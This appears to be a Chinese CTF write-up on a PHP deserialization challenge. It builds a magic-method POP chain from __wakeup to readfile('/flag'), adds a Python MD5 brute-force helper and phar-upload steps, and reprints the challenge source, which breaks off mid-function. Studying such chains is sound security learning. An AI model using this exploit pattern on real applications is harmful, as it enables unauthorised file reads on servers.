<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php">本题中存在的魔术方法：<br><span class="hljs-title function_ invoke__">__construct</span>():存在于**notes**类中，具有构造函数的类会在每次创建新对象时先调用此方法。<br><span class="hljs-title function_ invoke__">__toString</span>():存在于**lets**类中，方法用于一个类被当成字符串时应怎样回应。例如<span class="hljs-keyword">echo</span> <span class="hljs-variable">$obj</span>;应该显示些什么。 <br><span class="hljs-title function_ invoke__">__wakeup</span>():存在于**_0rays**类中，<span class="hljs-title function_ invoke__">unserialize</span>( )会检查是否存在一个<span class="hljs-title function_ invoke__">_wakeup</span>( )方法。如果存在，则会先调用__wakeup方法，预先准备对象需要的资源。<br><span class="hljs-title function_ invoke__">__get</span>():存在于**go**类中，当调用一个类及其父类方法中未定义的**属性**时<br><span class="hljs-title function_ invoke__">__set</span>():存在于**lets**类中，当设置一个类及其父类方法中未定义的**属性**时<br><span class="hljs-title function_ invoke__">__invoke</span>():存在于**lets**类中，调用函数的方式调用一个对象时的回应方法<br></code></pre></td></tr></table></figure>

<p>其次观察可利用于实现目的操作的语句</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php">发现目标存在于notes类中，只要让<span class="hljs-variable">$filepath</span>参数为<span class="hljs-string">&#x27;/flag&#x27;</span>即可通过<span class="hljs-title function_ invoke__">readfile</span>()获得flag：<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">notes</span></span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$filepath</span></span>)</span>&#123;<br>        <span class="hljs-title function_ invoke__">readfile</span>(<span class="hljs-variable">$filepath</span>);<br>    &#125;<br>&#125;<br><br><span class="hljs-comment">// flag in /flag , let&#x27;s go !!</span><br></code></pre></td></tr></table></figure>

<p>再次，寻找首个触发的魔术方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php">发现目标存在于_0rays类中的<span class="hljs-title function_ invoke__">__wakeup</span>()，当发生反序列化时会优先调用该方法<br>所以可以作为反序列化攻击的入口，从该方法开始到<span class="hljs-title function_ invoke__">__construct</span>(<span class="hljs-variable">$filepath</span>)方法的<span class="hljs-title function_ invoke__">readfile</span>()构造链子<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">_0rays</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$jbn</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$pankas</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$this</span> -&gt; jbn))&#123;<br>            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-built_in">Exception</span>(<span class="hljs-variable language_">$this</span> -&gt; pankas);<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;ha?&quot;</span>;<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<h4 id="2-深入分析，构造链子"><a href="#2-深入分析，构造链子" class="headerlink" title="2.深入分析，构造链子"></a>2.深入分析，构造链子</h4><p>这一步就需要结合每一个魔术方法的自动调用条件分析，然后以<u>套娃</u>的形式不断<u>将父类中的特定属性声明为调用魔术方法所在的类，实现魔术方法层层向目标调用的效果。</u>最后序列化生成 phar 文件用于上传。</p>
<p>1.__wakeup()作为入口：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">_0rays</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$jbn</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$pankas</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$this</span> -&gt; jbn))&#123;<br>        <span class="hljs-comment">//call_user_func($this -&gt; jbn)存在时throw抛出，可令属性$jbn=&#x27;phpinfo&#x27;</span><br>            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-built_in">Exception</span>(<span class="hljs-variable language_">$this</span> -&gt; pankas);<br>            <span class="hljs-comment">//属性$pankas作为字符串被抛出，因此可以联想到lets类中的魔术方法__toString()</span><br>            <span class="hljs-comment">//lets类被当做字符串时自动调用魔术方法__toString()</span><br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;ha?&quot;</span>;<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>2.令 $pankas 为 lets 类来衔接 lets 类中的魔术方法__toString()：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">lets</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-built_in">static</span> <span class="hljs-variable">$yolbby</span> = <span class="hljs-string">&quot;nonono&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$mak4r1</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ech0</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$rocket</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$errmis</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable">$humb1e</span> = <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$this</span> -&gt; mak4r1);<br>        <span class="hljs-variable">$k0rian</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$humb1e</span>,-<span class="hljs-number">4</span>,-<span class="hljs-number">1</span>);<br>        <span class="hljs-variable language_">$this</span> -&gt; rocket -&gt; dbg = <span class="hljs-variable">$k0rian</span>;<br>        <span class="hljs-comment">//$mak4r1用md5加密后的倒数2~4位赋值给一个未声明的属性，联想到lets类中的魔术方法__set()</span><br>        <span class="hljs-comment">//lets类未声明的属性被赋值时自动调用魔术方法__set()</span><br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;O.o?&quot;</span>;<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__set</span>(<span class="hljs-params"><span class="hljs-variable">$a</span>, <span class="hljs-variable">$b</span></span>)</span>&#123;<br>        <span class="hljs-built_in">self</span>::<span class="hljs-variable">$yolbby</span> = <span class="hljs-variable">$b</span>;<br>        <span class="hljs-variable">$int_barbituric</span> = <span class="hljs-variable language_">$this</span> -&gt; ech0 -&gt; gtg;<br><br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">notes</span>(<span class="hljs-variable">$this</span> -&gt; errmis);<br>    &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>3.令 $rocket 为 lets 类来衔接 lets 类中的魔术方法__set()：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">lets</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-built_in">static</span> <span class="hljs-variable">$yolbby</span> = <span class="hljs-string">&quot;nonono&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$mak4r1</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ech0</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$rocket</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$errmis</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable">$humb1e</span> = <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$this</span> -&gt; mak4r1);<br>        <span class="hljs-variable">$k0rian</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$humb1e</span>,-<span class="hljs-number">4</span>,-<span class="hljs-number">1</span>);<br>        <span class="hljs-variable language_">$this</span> -&gt; rocket -&gt; dbg = <span class="hljs-variable">$k0rian</span>;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;O.o?&quot;</span>;<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__set</span>(<span class="hljs-params"><span class="hljs-variable">$a</span>, <span class="hljs-variable">$b</span></span>)</span>&#123;<br>        <span class="hljs-comment">//$a为被赋值变量，$b为赋值变量，即上一层级的$k0rian</span><br>        <span class="hljs-built_in">self</span>::<span class="hljs-variable">$yolbby</span> = <span class="hljs-variable">$b</span>;<br>        <span class="hljs-variable">$int_barbituric</span> = <span class="hljs-variable language_">$this</span> -&gt; ech0 -&gt; gtg;<br>        <span class="hljs-comment">//未被声明的属性gtg赋值给变量$int_barbituric，联想到go类中的魔术方法__get()</span><br>        <span class="hljs-comment">//go类未声明的属性用于赋值时自动调用魔术方法__get()</span><br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">notes</span>(<span class="hljs-variable">$this</span> -&gt; errmis);<br>    &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>4.令 $ech0 为 go 类来衔接 go 类中的魔术方法__get()：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">go</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ed_xinhu</span>;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span>(<span class="hljs-params"><span class="hljs-variable">$c</span></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(lets::<span class="hljs-variable">$yolbby</span> === <span class="hljs-string">&quot;666&quot;</span>)&#123;<br>            <span class="hljs-comment">//当上一层级lets类变量$yolbby等于&quot;666&quot;时</span><br>            <span class="hljs-variable">$dilvey</span> = <span class="hljs-variable language_">$this</span> -&gt; ed_xinhu;<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable">$dilvey</span>();<br>            <span class="hljs-comment">//变量$dilvey被作为函数调用，联想到lets类中的魔术方法__invoke()</span><br>            <span class="hljs-comment">//lets类的对象被当做函数调用时自动调用魔术方法__invoke()</span><br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;you are going to win !&quot;</span>;<br>        &#125;<br>    &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>5.令 $ed_xinhu 为 lets 类来衔接 lets 类中的魔术方法__invoke()：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">lets</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-built_in">static</span> <span class="hljs-variable">$yolbby</span> = <span class="hljs-string">&quot;nonono&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$mak4r1</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ech0</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$rocket</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$errmis</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable">$humb1e</span> = <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$this</span> -&gt; mak4r1);<br>        <span class="hljs-variable">$k0rian</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$humb1e</span>,-<span class="hljs-number">4</span>,-<span class="hljs-number">1</span>);<br>        <span class="hljs-variable language_">$this</span> -&gt; rocket -&gt; dbg = <span class="hljs-variable">$k0rian</span>;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;O.o?&quot;</span>;<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__set</span>(<span class="hljs-params"><span class="hljs-variable">$a</span>, <span class="hljs-variable">$b</span></span>)</span>&#123;<br>        <span class="hljs-built_in">self</span>::<span class="hljs-variable">$yolbby</span> = <span class="hljs-variable">$b</span>;<br>        <span class="hljs-variable">$int_barbituric</span> = <span class="hljs-variable language_">$this</span> -&gt; ech0 -&gt; gtg;<br><br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">notes</span>(<span class="hljs-variable">$this</span> -&gt; errmis);<br>        <span class="hljs-comment">//创建参数为$errmis的notes类新对象，自动调用notes类魔术方法__construct()</span><br>    &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>6.令 $errmis 为’&#x2F;flag’：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">notes</span></span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$filepath</span></span>)</span>&#123;<br>        <span class="hljs-title function_ invoke__">readfile</span>(<span class="hljs-variable">$filepath</span>);<br>        <span class="hljs-comment">//参数传递给$filepath即执行readfile(&#x27;/flag&#x27;)</span><br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>7.综上构造链子</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$ray</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">_0rays</span>();<br><span class="hljs-variable">$ray</span>-&gt;jbn = <span class="hljs-string">&#x27;phpinfo&#x27;</span>;<br><span class="hljs-variable">$lets</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">lets</span>();<br><span class="hljs-variable">$lets</span>-&gt;mak4r1=<span class="hljs-string">&#x27;asc&#x27;</span>;<br><span class="hljs-comment">//$mak4r1--&gt;用md5加密--&gt;取倒数2~4位--&gt;$yolbby</span><br><span class="hljs-comment">//写个python脚本枚举出一个md5加密后密文满足&#x27;666&#x27;条件的字符串即可</span><br><span class="hljs-variable">$new_lets1</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">lets</span>();<br><span class="hljs-variable">$go</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">go</span>();<br><span class="hljs-variable">$go</span>-&gt;ed_xinhu=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">lets</span>();<br><span class="hljs-variable">$go</span>-&gt;ed_xinhu-&gt;errmis=<span class="hljs-string">&#x27;/flag&#x27;</span>;<br><span class="hljs-variable">$new_lets1</span>-&gt;ech0=<span class="hljs-variable">$go</span>;<br><span class="hljs-variable">$lets</span>-&gt;rocket=<span class="hljs-variable">$new_lets1</span>;<br><span class="hljs-variable">$ray</span>-&gt;pankas=<span class="hljs-variable">$lets</span>;<br></code></pre></td></tr></table></figure>

<p>枚举用的 python 脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> hashlib<br><span class="hljs-keyword">from</span> random <span class="hljs-keyword">import</span> randint<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">md5_hash</span>(<span class="hljs-params">input_string</span>):<br>    md5_hash = hashlib.md5()<br>    md5_hash.update(input_string.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>))<br>    <span class="hljs-keyword">return</span> md5_hash.hexdigest()<br><br><span class="hljs-keyword">while</span>(<span class="hljs-number">1</span>):<br>    input_string = <span class="hljs-built_in">chr</span>(randint(<span class="hljs-number">97</span>,<span class="hljs-number">122</span>))+<span class="hljs-built_in">chr</span>(randint(<span class="hljs-number">97</span>,<span class="hljs-number">122</span>))+<span class="hljs-built_in">chr</span>(randint(<span class="hljs-number">97</span>,<span class="hljs-number">122</span>))<br>    <span class="hljs-keyword">if</span> md5_hash(input_string)[-<span class="hljs-number">4</span>:-<span class="hljs-number">1</span>]== <span class="hljs-string">&quot;666&quot;</span>:<br>        <span class="hljs-built_in">print</span>(input_string)<br>        <span class="hljs-built_in">print</span>(md5_hash(input_string))<br>        <span class="hljs-keyword">break</span><br></code></pre></td></tr></table></figure>

<p>各对象变量的结构图</p>
<p><img src="/img/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E7%BB%93/1.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="3-生成-phar-文件，上传并触发反序列化"><a href="#3-生成-phar-文件，上传并触发反序列化" class="headerlink" title="3.生成 phar 文件，上传并触发反序列化"></a>3.生成 phar 文件，上传并触发反序列化</h4><p>结合上面写好的在本地跑出 phar 文件并测试正确性，可以用小皮看一下效果，也可以 vscode 上配一下环境调试一下看看，加深反序列化攻击过程的理解。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-comment">// easy unserialize chain OuO</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">notes</span></span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$filepath</span></span>)</span>&#123;<br>        <span class="hljs-title function_ invoke__">readfile</span>(<span class="hljs-variable">$filepath</span>);<br>    &#125;<br>&#125;<br><br><span class="hljs-comment">// flag in /flag , let&#x27;s go !!</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">_0rays</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$jbn</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$pankas</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$this</span> -&gt; jbn))&#123;<br>            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-built_in">Exception</span>(<span class="hljs-variable language_">$this</span> -&gt; pankas);<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;ha?&quot;</span>;<br>        &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">lets</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-built_in">static</span> <span class="hljs-variable">$yolbby</span> = <span class="hljs-string">&quot;nonono&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$mak4r1</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ech0</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$rocket</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$errmis</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable">$humb1e</span> = <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$this</span> -&gt; mak4r1);<br>        <span class="hljs-variable">$k0rian</span> = <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$humb1e</span>,-<span class="hljs-number">4</span>,-<span class="hljs-number">1</span>);<br>        <span class="hljs-variable language_">$this</span> -&gt; rocket -&gt; dbg = <span class="hljs-variable">$k0rian</span>;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;O.o?&quot;</span>;<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__set</span>(<span class="hljs-params"><span class="hljs-variable">$a</span>, <span class="hljs-variable">$b</span></span>)</span>&#123;<br>        <span class="hljs-built_in">self</span>::<span class="hljs-variable">$yolbby</span> = <span class="hljs-variable">$b</span>;<br>        <span class="hljs-variable">$int_barbituric</span> = <span class="hljs-variable language_">$this</span> -&gt; ech0 -&gt; gtg;<br><br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">notes</span>(<span class="hljs-variable">$this</span> -&gt; errmis);<br>    &#125;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">go</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ed_xinhu</span>;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span>(<span class="hljs-params"><span class="hljs-variable">$c</span></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(lets::<span class="hljs-variable">$yolbby</span> === <span class="hljs-string">&quot;666&quot;</span>)&#123;<br>            <span class="hljs-variable">$dilvey</span> = <span class="hljs-variable language_">$this</span> -&gt; ed_xinhu;<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable">$dilvey</span>();<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;you are going to win !&quot;</span>;<br>        &#125;<br>    &#125;<br><br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">check</span>(<span class="hljs-params"><span class="hljs-variable">$filePath</span></span>) </span>&#123;<br>    <span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$filePath</span>))&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>    &#125;<br>    